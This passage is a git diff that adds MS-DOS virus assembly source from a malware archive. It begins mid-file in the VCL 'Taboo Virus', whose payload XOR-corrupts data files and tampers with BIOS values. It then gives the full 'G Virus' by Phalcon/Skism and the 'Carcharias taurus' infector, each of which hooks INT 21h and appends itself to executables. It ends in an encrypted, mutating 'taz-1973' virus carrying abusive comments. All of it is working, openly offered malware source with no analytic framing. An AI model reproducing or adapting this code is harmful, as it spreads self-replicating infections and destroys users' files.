speaker bit + out 061h,al ; Write AL to speaker port + add dx,09248h ; + mov cl,3 ; + ror dx,cl ; Figure out the delay time + mov cx,dx ; + and cx,01FFh ; + or cx,10 ; +shoot_pause: loop shoot_pause ; Delay a bit + dec bx ; Are we done with the shot? + jnz fire_shot ; If not, pulse the speaker + and al,11111100b ; Turn off the speaker bit + out 061h,al ; Write AL to speaker port + mov bx,0002h ; BX holds delay time (ticks) + xor ah,ah ; Get time function + int 1Ah ; BIOS timer interrupt + add bx,dx ; Add current time to delay +shoot_delay: int 1Ah ; Get the time again + cmp dx,bx ; Are we done yet? + jne shoot_delay ; If not, keep checking + pop cx ; Restore the count + loop new_shot ; Do another shot + +end01: call get_rollover + cmp ax,0001h ; Did the function return 1? + je strt02 ; If equal, do effect + jmp end02 ; Otherwise skip over it +strt02: mov dx,00C8h ; First argument is 200 + push es ; Save ES + mov ax,040h ; Set extra segment to 040h + mov es,ax ; (ROM BIOS) + mov word ptr es:[013h],dx ; Store new RAM ammount + pop es ; Restore ES + +end02: call get_day + cmp ax,0007h ; Did the function return 7? + jg strt03 ; If greater, do effect + jmp end03 ; Otherwise skip over it +strt03: xor bx,bx ; Clear BX + mov si,0001h ; Second argument is 1 + push es ; Save ES + xor ax,ax ; Set the extra segment to + mov es,ax ; zero (ROM BIOS) + shl bx,1 ; Convert to word index + shl si,1 ; Convert to word index + mov ax,word ptr [bx + 03FEh]; Zero COM port address + xchg word ptr [si + 03FEh],ax; Put first value in second, + mov word ptr [bx + 03FEh],ax; and second value in first! + pop es ; Restore ES + +end03: call get_dos_version + or ax,ax ; Did the function return zero? + jg strt04 ; If greater, do effect + jmp end04 ; Otherwise skip over it +strt04: mov dx,offset data00 ; DX points to data + push bp ; Save BP + mov bp,sp ; BP points to stack frame + sub sp,4096 ; Allocate 4096-byte buffer + push di ; Save DI + mov ah,02Fh ; DOS get DTA function + int 021h + mov di,bx ; DI points to DTA + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + int 021h + jc corrupt_end ; If no files found then exit +corrupt_file: mov ax,04301h ; DOS set file attributes function + xor cx,cx ; File will have no attributes + lea dx,[di + 01Eh] ; DX points to file name + int 021h + mov ax,03D02h ; DOS open file function, r/w + lea dx,[di + 01Eh] ; DX points to file name + int 021h + xchg bx,ax ; Transfer file handle to AX +c_crypt_loop: mov ah,03Fh ; DOS read from file function + mov cx,4096 ; Read 4k of characters + lea dx,[bp - 4096] ; DX points to the buffer + int 021h + or ax,ax ; Were 0 bytes read? + je close_c_file ; If so then close it up + push ax ; Save AX + lea si,[bp - 4096] ; SI points to the buffer + xor ah,ah ; BIOS get clock ticks function + int 01Ah + pop cx ; CX holds number of bytes read + push cx ; Save CX +corrupt_bytes: xor byte ptr [si],dl ; XOR byte by clock ticks + inc si ; Do the next byte + inc dx ; Change the key for next byte + loop corrupt_bytes ; Repeat until buffer is done + pop dx ; Restore DX (holds bytes read) + push dx ; Save count for write + mov ax,04201h ; DOS file seek function, current + mov cx,0FFFFh ; Seeking backwards + neg dx ; Seeking backwards + int 021h + mov ah,040h ; DOS write to file function + pop cx ; CX holds number of bytes read + lea dx,[bp - 4096] ; DX points to the buffer + int 021h + jmp short c_crypt_loop +close_c_file: mov ax,05701h ; DOS set file date/time function + mov cx,[di + 016h] ; CX holds old file time + mov dx,[di + 018h] ; DX holds old file data + int 021h + mov ah,03Eh ; DOS close file function + int 021h + mov ax,04301h ; DOS set file attributes function + xor ch,ch ; Clear CH for attributes + mov cl,[di + 015h] ; CL holds old attributes + lea dx,[di + 01Eh] ; DX points to file name + int 021h + mov ah,04Fh ; DOS find next file function + int 021h + jnc corrupt_file ; If successful do next file +corrupt_end: pop di ; Restore DI + mov sp,bp ; Deallocate local buffer + pop bp ; Restore BP + +end04: pop ax ; AL holds return value + mov ah,04Ch ; DOS terminate function + int 021h +main endp + + + db 0C3h,0FDh,0C2h,0F3h,0C7h + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,64 ; Allocate 64 bytes on stack + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 64] ; SI points to 64-byte buffer + int 021h + + mov ah,03Bh ; DOS change directory function + mov dx,offset root ; DX points to root directory + int 021h + + call traverse ; Start the traversal + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 64] ; DX points to old directory + int 021h + + mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller + +root db "\",0 ; Root directory +search_files endp + +traverse proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first function + mov cx,00010000b ; CX holds search attributes + mov dx,offset all_files ; DX points to "*.*" + int 021h + jc leave_traverse ; Leave if no files present + +check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? + jne another_dir ; If not, try again + cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? + je another_dir ;If so, keep going + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 98] ; DX points to new directory + int 021h + + call traverse ; Recursively call ourself + + pushf ; Save the flags + mov ah,03Bh ; DOS change directory function + mov dx,offset up_dir ; DX points to parent directory + int 021h + popf ; Restore the flags + + jnc done_searching ; If we infected then exit + +another_dir: mov ah,04Fh ; DOS find next function + int 021h + jnc check_dir ; If found check the file + +leave_traverse: + mov dx,offset exe_mask ; DX points to "*.EXE" + call find_files ; Try to infect a file +done_searching: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller + +up_dir db "..",0 ; Parent directory name +all_files db "*.*",0 ; Directories to search for +exe_mask db "*.EXE",0 ; Mask for all .EXE files +traverse endp + + db 075h,03Dh,0BDh,095h,0EAh + + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! + jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + + db 0E7h,096h,07Dh,03Ch,0BEh + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov di,bx ; DI points to the DTA + + lea si,[di + 01Eh] ; SI points to file name + mov dx,si ; DX points to file name, too + mov di,offset spawn_name + 1; DI points to new name + xor ah,ah ; AH holds character count +transfer_loop: lodsb ; Load a character + or al,al ; Is it a NULL? + je transfer_end ; If so then leave the loop + inc ah ; Add one to the character count + stosb ; Save the byte in the buffer + jmp short transfer_loop ; Repeat the loop +transfer_end: mov byte ptr [spawn_name],ah; First byte holds char. count + mov byte ptr [di],13 ; Make CR the final character + + mov di,dx ; DI points to file name + xor ch,ch ; + mov cl,ah ; CX holds length of filename + mov al,'.' ; AL holds char. to search for + repne scasb ; Search for a dot in the name + mov word ptr [di],'OC' ; Store "CO" as first two bytes + mov byte ptr [di + 2],'M' ; Store "M" to make "COM" + + mov byte ptr [set_carry],0 ; Assume we'll fail + mov ax,03D00h ; DOS open file function, r/o + int 021h + jnc infection_done ; File already exists, so leave + mov byte ptr [set_carry],1 ; Success -- the file is OK + + mov ah,03Ch ; DOS create file function + mov cx,00100111b ; CX holds file attributes (all) + int 021h + xchg bx,ax ; BX holds file handle + + call encrypt_code ; Write an encrypted copy + + mov ah,03Eh ; DOS close file function + int 021h + +infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed + ret ; Return to caller + +spawn_name db 12,12 dup (?),13 ; Name for next spawn +set_carry db ? ; Set-carry-on-exit flag +infect_file endp + + + db 08Dh,0EDh,035h,0A0h,000h + +get_cpu proc near + mov dx,86 ; Assume it's an 8088/8086 + push sp + pop ax + cmp sp,ax + jne get_cpu_end ; If the test failed then exit + mov dx,286 ; Assume it's an 80286 + pushf + pop ax + or ax,04000h + popf + pushf + pop ax + test ax,04000h + jne get_cpu_end ; If the test failed then exit + mov dx,386 ; Assume it's an 80386 +.386c ; We have to use 386 instructions + mov ebx,esp + and esp,0FFFCh + pushfd + pop eax + mov ecx,eax + xor ax,0004h + push eax + popfd + pushfd + pop eax + and eax,0004h + and ecx,0004h + cmp eax,ecx + je is_386 ; If the test failed it's a 386 + mov dx,486 ; It must be a 80486 then +is_386: push ecx + popfd + mov esp,ebx +get_cpu_end: xchg dx,ax ; Transfer chip type to AX + ret ; Return to caller +get_cpu endp + + db 0F6h,016h,05Ch,072h,084h + +get_day proc near + mov ah,02Ah ; DOS get date function + int 021h + mov al,dl ; Copy day into AL + cbw ; Sign-extend AL into AX + ret ; Return to caller +get_day endp + + db 0C6h,02Eh,047h,0ACh,053h + +get_dos_version proc near + mov ah,030h ; DOS get DOS version function + int 021h + mov bx,ax ; Save return value in BX + xor bl,bl ; Clear DOS major version in BX + xchg bh,bl ; Place 0 in BH, minor in BL + cbw ; Sign-extend AL into AX + mov cl,100 ; CL holds multiplier + mul cl ; Multiply AL by 100 + add ax,bx ; Add back the minor version + ret ; Return to caller +get_dos_version endp + + db 03Ah,06Fh,04Ah,03Dh,091h + +get_minute proc near + mov ah,02Ch ; DOS get time function + int 021h + mov al,cl ; Copy minute into AL + cbw ; Sign-extend AL into AX + ret ; Return to caller +get_minute endp + + db 02Ah,0D1h,031h,0C6h,081h + +get_rollover proc near + push es ; Save ES + mov ax,040h ; Set the extra segment to + mov es,ax ; 040h (ROM BIOS) + mov al,byte ptr [0070h] ; AL holds rollover flag + cbw ; Sign-extend AL into AX + pop es ; Restore ES + ret ; Return to caller +get_rollover endp + +data00 db "*.Dat" + +vcl_marker db "[VCL]",0 ; VCL creation marker + + +note db "Taboo Virus" + db "Version 2.12" + db "By Virucidal Maniac" + +encrypt_code proc near + mov si,offset encrypt_decrypt; SI points to cipher routine + + xor ah,ah ; BIOS get time function + int 01Ah + mov word ptr [si + 8],dx ; Low word of timer is new key + + xor byte ptr [si],1 ; + xor byte ptr [si + 7],1 ; Change all SIs to DIs + xor word ptr [si + 10],0101h; (and vice-versa) + + mov di,offset finish ; Copy routine into heap + mov cx,finish - encrypt_decrypt - 1 ; All but final RET + push si ; Save SI for later + push cx ; Save CX for later + rep movsb ; Copy the bytes + + mov si,offset write_stuff ; SI points to write stuff + mov cx,5 ; CX holds length of write + rep movsb ; Copy the bytes + + pop cx ; Restore CX + pop si ; Restore SI + inc cx ; Copy the RET also this time + rep movsb ; Copy the routine again + + mov ah,040h ; DOS write to file function + mov dx,offset start ; DX points to virus + + call finish ; Encrypt/write/decrypt + + ret ; Return to caller + +write_stuff: mov cx,finish - start ; Length of code + int 021h +encrypt_code endp + +end_of_code label near + +encrypt_decrypt proc near + mov si,offset start_of_code ; SI points to code to decrypt + mov cx,(end_of_code - start_of_code) / 2 ; CX holds length +xor_loop: db 081h,034h,00h,00h ; XOR a word by the key + inc si ; Do the next word + inc si ; + loop xor_loop ; Loop until we're through + ret ; Return to caller +encrypt_decrypt endp +finish label near + +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.target.asm b/MSDOS/Virus.MSDOS.Unknown.target.asm new file mode 100644 index 00000000..df9f141a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.target.asm @@ -0,0 +1,313 @@ +; Virus generated by G 0.70 +; G written by Dark Angel of Phalcon/Skism + +; File: TARGET.ASM +; [G Virus] by Phalcon/Skism + +checkres1 = 'FF' +checkres2 = 'FF' +id = 'FF' + + .model tiny + .code + +; Assemble with: +; TASM /m3 filename.ASM +; TLINK filename.OBJ +; EXE2BIN filename.EXE filename.COM + org 0000h + +start: + call next +next: + pop bp + sub bp, offset next + + push es + push ds + + mov ax, checkres1 ; Installation check + int 0021h + cmp ax, checkres2 ; Already installed? + jz done_install + + mov ah, 004Ah ; alter memory allocation + mov bx, 0FFFFh ; of segment at ES + int 0021h + + sub bx, (endheap-start+15)/16+1 + mov ah, 004Ah ; alter memory allocation + int 0021h + jc done_install + sub word ptr ds:[0002h], (endheap-start+15)/16+1 + + mov ah, 0048h ; Allocate memory for the virus + mov bx, (endheap-start+15)/16 + int 0021h + jc done_install + + mov es, ax + dec ax + mov ds, ax ; Get MCB + + mov byte ptr ds:[0000h], 'Z' ; Mark end of chain + mov word ptr ds:[0001h], 0008h ; Mark owner = DOS + + push cs + pop ds + xor di, di + mov cx, (heap-start)/2+1 ; Bytes to move + mov si, bp ; lea si,[bp+offset start] + rep movsw + + xor ax, ax + mov ds, ax + push ds + lds ax, ds:[21h*4] ; Get old int handler + mov word ptr es:oldint21, ax + mov word ptr es:oldint21+2, ds + pop ds + mov word ptr ds:[21h*4], offset int21 ; Replace with new handler + mov ds:[21h*4+2], es ; in high memory + +done_install: + pop es + pop ds + cmp sp, id + jne restore_COM +restore_EXE: + mov ax, es + add ax, 0010h + add cs:[bp+word ptr origCSIP+2], ax + add ax, cs:[bp+word ptr origSPSS] + cli + mov ss, ax + mov sp, cs:[bp+word ptr origSPSS+2] + sti + db 00EAh +origCSIP db ? +old3 db 0cdh,20h,0 +origSPSS dd ? + +restore_COM: + mov di, 0100h + push di + lea si, [bp+offset old3] + movsw + movsb + ret + +INT24: + mov al, 0003h + iret + +int21: + push ax + push bx + push cx + push dx + push si + push di + push ds + push es + + cmp ax, 4B00h ; execute? + jz execute +return: + jmp exitint21 +execute: + mov word ptr cs:filename, dx + mov word ptr cs:filename+2, ds + mov ax, 3524h + int 0021h + push es + push bx + + lea dx, INT24 ; ASSumes ds=cs + mov ax, 2524h + int 0021h + + push cs + pop es + + + mov bx, dx + cmp word ptr [bx+5], 'DN' ; Check if COMMAND.COM + jz return ; Exit if so + + lds dx, cs:filename + mov ax, 4300h + int 0021h + jc return + push cx + push ds + push dx + + mov ax, 4301h ; clear file attributes + push ax ; save for later use + xor cx, cx + int 0021h + + mov ax, 3D02h + lds dx, cs:filename + int 0021h + xchg ax, bx + + push cs + pop ds + + mov ax, 5700h ; get file time/date + int 0021h + push cx + push dx + + mov ah, 003Fh + mov cx, 001Ah + mov dx, offset readbuffer + int 0021h + + mov ax, 4202h + xor cx, cx + cwd + int 0021h + + cmp word ptr [offset readbuffer], 'ZM' + jz checkEXE + + mov cx, word ptr [offset readbuffer+1] ; jmp location + add cx, heap-start+3 ; convert to filesize + cmp ax, cx ; equal if already infected + jz jmp_close + + cmp ax, 65535-(endheap-start) ; check if too large + ja jmp_close ; Exit if so + + mov si, offset readbuffer + mov di, offset old3 + movsb + movsw + + mov cx, 0003h + sub ax, cx + mov word ptr [offset readbuffer+1], ax + mov dl, 00E9h + mov byte ptr [offset readbuffer], dl + jmp short continue_infect +checkEXE: + cmp word ptr [offset readbuffer+10h], id + jnz skipp +jmp_close: + jmp close +skipp: + + lea si, readbuffer+14h + lea di, origCSIP + movsw ; Save original CS and IP + movsw + + sub si, 000Ah + movsw ; Save original SS and SP + movsw + + push bx ; save file handle + mov bx, word ptr [readbuffer+8] ; Header size in paragraphs + mov cl, 0004h + shl bx, cl + + push dx ; Save file size on the + push ax ; stack + + sub ax, bx ; File size - Header size + sbb dx, 0000h ; DX:AX - BX -> DX:AX + + mov cx, 0010h + div cx ; DX:AX/CX = AX Remainder DX + + mov word ptr [readbuffer+14h], dx ; IP Offset + mov word ptr [readbuffer+10h], id ; Initial SP + mov word ptr [readbuffer+0Eh], ax ; Para disp stack segment + mov word ptr [readbuffer+16h], ax ; Para disp CS in module. + + pop ax ; Filelength in DX:AX + pop dx + + add ax, heap-start + adc dx, 0000h + + mov cl, 0009h + push ax + shr ax, cl + ror dx, cl + stc + adc dx, ax + pop ax + and ah, 0001h + + mov word ptr [readbuffer+4], dx ; Fix-up the file size in + mov word ptr [readbuffer+2], ax ; the EXE header. + + pop bx ; restore file handle + mov cx, 001Ah + +continue_infect: + push cx ; save # bytes to write + + mov cx, heap-start + mov ah, 0040h ; concatenate virus + mov dx, offset start + int 0021h + + xor dx, dx + xor cx, cx + mov ax, 4200h + int 0021h + + + pop cx + mov ah, 0040h + mov dx, offset readbuffer + int 0021h + + +close: + mov ax, 5701h ; restore file time/date + pop dx + pop cx + int 0021h + + mov ah, 003Eh + int 0021h + + pop ax ; restore file attributes + pop dx ; get filename and + pop ds + pop cx ; attributes from stack + int 0021h + + pop dx + pop ds + mov ax, 2524h + int 0021h + +exitint21: + pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + + db 00EAh ; return to original handler +oldint21 dd ? + +signature db '[PS/G]',0 ; Phalcon/Skism G +creator db 'Phalcon/Skism',0 +virusname db '[G Virus]',0 + +heap: +filename dd ? +readbuffer db 1ah dup (?) +endheap: + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.taurus.asm b/MSDOS/Virus.MSDOS.Unknown.taurus.asm new file mode 100644 index 00000000..95dda9cc --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.taurus.asm @@ -0,0 +1,378 @@ +TITLE The Carcharias taurus 2.0 + .MODEL Tiny + .CODE + .STARTUP + +; Some Constants ------------------------------------------------------------- + DogSize equ 584-16-6 +; ---------------------------------------------------------------------------- + + db 0E9h ; JMP Loader + dw 3 + db 0 + dw 0256h +; ************************** DOG LOADER ************************************** + Loader: + + call GetBP ; Get BP + GetBP: pop BP + sub BP, 103h + push AX ; Save AX + +; Find Z-MCB ----------------------------------------------------------------- + mov AH, 52h + int 21h + + mov DX, ES:[BX-2] + mov DI, (OFFSET Place)-6 + mov DS:[BP+DI], DX + + NEXT0: + mov DI, (OFFSET Place)-6 + mov ES, DS:[BP+DI] + mov DX, ES:[3] ; Calc the next MCB seg + inc DX + add DS:[BP+DI], DX + + cmp ES:[0], byte ptr 'Z' + jne NEXT0 +; ---------------------------------------------------------------------------- + +; Looking for the Dog behind Z-MCB ------------------------------------------- + push ES + mov DX, ES + add DX, ES:[3] + inc DX + mov ES, DX + mov DX, ES:[3] + pop ES + cmp DX, 815Dh ; 815Dh - Dog's bytes + je LExit +; ---------------------------------------------------------------------------- + + +; Eat 1K in the Z-MCB, Current PSP, BIOS Data -------------------------------- + + push DS + sub ES:[3], word ptr 40h ; Dec Z-MCB + + mov AH, 62h + int 21h + mov DS, BX + sub DS:[2], word ptr 40h ; Dec Curr PSP + + xor DX, DX + mov DS, DX + dec word ptr DS:[413h] + + pop DS +; ---------------------------------------------------------------------------- + +; Calculate Dog's segment adress --------------------------------------------- + mov DX, CS + add DX, ES:[3] + mov ES, DX +; ---------------------------------------------------------------------------- + +; Now load the Dog ----------------------------------------------------------- + xor DI, DI + mov SI, BP + add SI, 100h + mov CX, DogSize + cld + rep movsb +; ---------------------------------------------------------------------------- + +; Hook 21h ------------------------------------------------------------------- +; Get old vector + push ES + mov AX, 3521h + int 21h + mov DX, ES + pop ES + mov DI, (OFFSET Exit21h)-100h-6+1 + mov ES:[DI], BX + inc DI + inc DI + mov ES:[DI], DX + +; Set 21h to Dog + mov AX, 2521h + mov DX, (OFFSET Dog)-100h-6 + push DS + push ES + pop DS + int 21h + pop DS +; ---------------------------------------------------------------------------- + +; Loader Exit ---------------------------------------------------------------- + LExit: +; Restore first 6 bytes + mov DI, (OFFSET M_6Bytes)-6 + mov AX, word ptr DS:[BP+DI] + inc DI + inc DI + mov BX, word ptr DS:[BP+DI] + inc DI + inc DI + mov CX, word ptr DS:[BP+DI] + mov word ptr CS:[100h], AX + mov word ptr CS:[102h], BX + mov word ptr CS:[104h], CX + +; Restore all registers + pop AX + xor BX, BX + xor CX, CX + xor DI, DI + xor SI, SI + xor BP, BP + mov DX, 100h + push DX + xor DX, DX + push DS + pop ES + ret +; ---------------------------------------------------------------------------- + +; ************************** END of DOG LOADER ******************************* + + +; ******************************* DOG ************************************** + Dog: + pushf + cmp AX, 4B00h + je D01 + jmp QuickExit + D01: push AX + push BX + push CX + push DX + push DI + push SI + push DS + push ES + + push DX ; Store file name + push DS + + +; Effect ? ------------------------------------------------------------------- + mov AH, 2Ah + int 21h + cmp CX, 1993 ; After 1992 + jb EExit + cmp DH, 1 ; Jan, + jne EExit + mov AH, 2Ch + int 21h + cmp CH, 14 + jne EExit + cmp CL, 30 + jb EExit +; yes! + push CS + pop DS + mov CX, 20 + mov AH, 2 + mov SI, (OFFSET Tired)-100h-6 + CHN: mov DL, byte ptr DS:[SI] + inc SI + dec DL + int 21h + loop CHN +; cli +; hlt +; ---------------------------------------------------------------------------- + + EExit: +; Store old int 24h vector --------------------------------------------------- + mov AX, 3524h ; Get intrpt vector (ES:BX) + int 21h + mov DI, (OFFSET Old24h)-100h-6 + mov CS:[DI], BX ; Store BX + inc DI + inc DI + mov CS:[DI], ES ; Store ES +; ---------------------------------------------------------------------------- + +; Set new int 24h handler ---------------------------------------------------- + mov AX, 2524h ; Set intrpt vector (DS:DX) + mov DX, (OFFSET INT24)-100h-6 + push CS + pop DS + int 21h +; ---------------------------------------------------------------------------- + + +; ----------------------------------------------------- + pop DS + pop DX +; ---------------------------------------------------------------------------- + + +; Open the file -------------------------------------------------------------- + mov AX, 3D02h + int 21h + mov DI, (OFFSET Handle)-100h-6 + mov CS:[DI], AX + jnc D02 + jmp DExit + D02: +; ---------------------------------------------------------------------------- + +; Read 1st 6 bytes ----------------------------------------------------------- + push CS + pop DS + mov AH, 3Fh + mov DI, (OFFSET Handle)-100h-6 + mov BX, CS:[DI] + mov DX, (OFFSET M_6Bytes)-100h-6 + mov CX, 6 + int 21h + jnc D03 + jmp DExit + + D03: +; ---------------------------------------------------------------------------- + +; Check File Format ---------------------------------------------------------- + mov DI, (OFFSET M_6Bytes)-100h-6 + cmp CS:[DI], 4D5Ah + jne D04 + jmp DExit + D04: cmp CS:[DI], 5A4Dh + je DExit +; ---------------------------------------------------------------------------- + +; Check File for Dog --------------------------------------------------------- + cmp CS:[DI+3], 0256h + je DExit +; ---------------------------------------------------------------------------- + +; Get and Store file Date&Time ----------------------------------------------- + mov AX, 5700h + mov DI, (OFFSET Handle)-100h-6 + mov BX, CS:[DI] + int 21h + mov DI, (OFFSET FDate)-100h-6 + mov CS:[DI], DX + inc DI + inc DI + mov CS:[DI], CX +; ---------------------------------------------------------------------------- + +; Get and Store file Size ---------------------------------------------------- + mov AX, 4202h + mov DI, (OFFSET Handle)-100h-6 + mov BX, CS:[DI] + xor DX, DX + xor CX, CX + int 21h + mov DI, (OFFSET FSize)-100h-6 + sub AX, 3 + mov CS:[DI], AX + cmp AX, 64512 + ja DExit + cmp AX, 6 + jb DExit +; ---------------------------------------------------------------------------- + + +; Add Dog to the file -------------------------------------------------------- + push CS + pop DS + mov AH, 40h + mov DI, (OFFSET Handle)-100h-6 + mov BX, CS:[DI] + mov CX, DogSize + xor DX, DX + int 21h +; ---------------------------------------------------------------------------- + +; Write 1st 6 bytes to file -------------------------------------------------- +; Move file ptr to the start + mov AX, 4200h + mov DI, (OFFSET Handle)-100h-6 + mov BX, CS:[DI] + xor DX, DX + xor CX, CX + int 21h +; Write ... + mov AH, 40h + mov DI, (OFFSET Handle)-100h-6 + mov BX, CS:[DI] + mov CX, 6 + mov DX, (OFFSET DogCall)-100h-6 + int 21h +; ---------------------------------------------------------------------------- + + DExit: + +; Set file Date&Time --------------------------------------------------------- + mov AX, 5701h + mov DI, (OFFSET Handle)-100h-6 + mov BX, CS:[DI] + mov DI, (OFFSET FDate)-100h-6 + mov DX, CS:[DI] + inc DI + inc DI + mov CX, CS:[DI] + int 21h +; ---------------------------------------------------------------------------- + + +; Close the file ------------------------------------------------------------- + mov AH, 3Eh + mov DI, (OFFSET Handle)-100h-6 + mov BX, CS:[DI] + int 21h +; ---------------------------------------------------------------------------- + +; Restore int 24h ------------------------------------------------------------ + mov AX, 2524h ; Set intrpt vector (DS:DX) + mov DI, (OFFSET Old24h)-100h-6 + mov DX, CS:[DI] + inc DI + inc DI + mov DS, CS:[DI] + int 21h +; ---------------------------------------------------------------------------- + + pop ES + pop DS + pop SI + pop DI + pop DX + pop CX + pop BX + pop AX + + QuickExit: popf + Exit21h: db 0EAh + Int21hIP: dw 0 ; BX + Int21hCS: dw 0 ; ES + +; Int 24h handler ------------------------------------------------------------ + INT24: xor al, al ; Ignore critical error + iret +; ---------------------------------------------------------------------------- + + +; **************************** END of DOG ********************************** + + DogData: + M_6Bytes db 90h, 90h, 90h, 90h, 90h, 0C3h + Tired db 11, 11, 'Ibqqz!Ofx!Zfbs!"', 14, 11 + DogCall db 0E9h + FSize dw 0606h + Sign db 'V', 2 + Handle dw 0606h + Vers dw 0606h + FDate dw 0606h, 0606h ; Date, Time + Old24h dw 0606h, 0606h ; BX:ES + Attrib dw 0606h + Place dw 0606h + END + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.taz-1973.asm b/MSDOS/Virus.MSDOS.Unknown.taz-1973.asm new file mode 100644 index 00000000..672cf27b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.taz-1973.asm @@ -0,0 +1,278 @@ +cr equ 13 ; This VIRUS was written 12-14-1992 +lf equ 10 ; AND QUIT READING MY SOURCE CODE +tab equ 9 ; YOU SHITHEAD FUCKNOSE DOUCHE BAG +virus_size equ 1973 ; QUEERBAIT VIRUS TRACKER WANNA-BE! +code_start equ 100h ; Address right after PSP in memory +dta equ 80h ; Addr of default disk transfer area +datestamp equ 24 ; Offset in DTA of file's date stamp +timestamp equ 22 ; Offset in DTA of file's time stamp +filename equ 30 ; Offset in DTA of ASCIIZ filename +attribute equ 21 ; Offset in DTA of file attribute + + + code segment 'code' ; Open code segment + assume cs:code,ds:code ; One segment for both code & data + org code_start ; Start code image after PSP + +;--------------------------------------------------------------------- +; All executable code is contained in boundaries of procedure "main". +; The following code, until the start of "virus_code", is the non- +; encrypted CMT portion of the code to load up the real program. +;--------------------------------------------------------------------- +main proc near ; Code execution begins here + call encrypt_decrypt ; Decrypt the real virus code + jmp random_mutation ; Put the virus into action + +encrypt_val db 00h ; Hold value to encrypt by here + +; ---------- Encrypt, save, and restore the virus code ----------- +infect_file: + mov bx,handle ; Get the handle + push bx ; Save it on the stack + call encrypt_decrypt ; Encrypt most of the code + pop bx ; Get back the handle + mov cx,virus_size ; Total number of bytes to write + mov dx,code_start ; Buffer where code starts in memory + mov ah,40h ; DOS write-to-handle service + int 21h ; Write the virus code into the file + call encrypt_decrypt ; Restore the code as it was + ret ; Go back to where you came from + +; --------------- Encrypt or decrypt the virus code ---------------- +encrypt_decrypt: + mov bx,offset virus_code ; Get address to start encrypt/decrypt +xor_loop: ; Start cycle here + mov ah,[bx] ; Get the current byte + xor ah,encrypt_val ; Engage/disengage XOR scheme on it + mov [bx],ah ; Put it back where we got it + inc bx ; Move BX ahead a byte + cmp bx,offset virus_code+virus_size ; Are we at the end? + jle xor_loop ; If not, do another cycle + ret ; and go back where we came from + +;----------------------------------------------------------------------- +; The rest of the code from here on remains encrypted until run-time, +; using a fundamental XOR technique that changes via CMT. +;----------------------------------------------------------------------- +virus_code: + +;---------------------------------------------------------------------------- +; All strings are kept here in the file, and automatically encrypted. +; Please don't be a lamer and change the strings and say you wrote a virus. +; Because of Cybernetic Mutation Technology(tm), the CRC of this file often +; changes, even when the strings stay the same. +;---------------------------------------------------------------------------- +exe_filespec db "*.EXE",0 +com_filespec db "*.COM",0 +newdir db "..",0 +fake_msg db cr,lf,"Bad command or filename$" +virus_msg1 db cr,lf," $" +virus_msg2 db cr,lf," $" +virus_msg3 db cr,lf," $" +virus_msg4 db cr,lf," $" +virus_msg5 db cr,lf," $" +virus_msg6 db cr,lf," $" +virus_msg7 db cr,lf," $" +virus_msg8 db cr,lf," $" +virus_msg9 db cr,lf," $" +virus_msg10 db cr,lf," $" +virus_msg11 db cr,lf," $" +virus_msg12 db cr,lf," $" +virus_msg13 db cr,lf," $" +virus_msg14 db cr,lf," $" +virus_msg15 db cr,lf," $" +virus_msg16 db cr,lf," $" +virus_msg17 db cr,lf," $" +virus_msg18 db cr,lf," $" +virus_msg19 db cr,lf," $" +virus_msg20 db cr,lf," $" +virus_msg21 db cr,lf," $" +virus_msg22 db cr,lf," $" +virus_msg23 db cr,lf," $" +compare_buf db 20 dup (?) ; Buffer to compare files in +files_found db ? +files_infected db ? +orig_time dw ? +orig_date dw ? +orig_attr dw ? +handle dw ? +success db ? + +random_mutation: ; First decide if virus is to mutate + mov ah,2ch ; Set up DOS function to get time + int 21h + cmp encrypt_val,0 ; Is this a first-run virus copy? + je install_val ; If so, install whatever you get. + cmp dh,15 ; Is it less than 16 seconds? + jg find_extension ; If not, don't mutate this time +install_val: + cmp dl,0 ; Will we be encrypting using zero? + je random_mutation ; If so, get a new value. + mov encrypt_val,dl ; Otherwise, save the new value +find_extension: ; Locate file w/ valid extension + mov files_found,0 ; Count infected files found + mov files_infected,10 ; BX counts file infected so far + mov success,0 +find_exe: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset exe_filespec ; Check for .EXE extension first + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je find_com ; If not, nothing more to do + call find_healthy ; Otherwise, try to find healthy .EXE +find_com: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset com_filespec ; Check for .COM 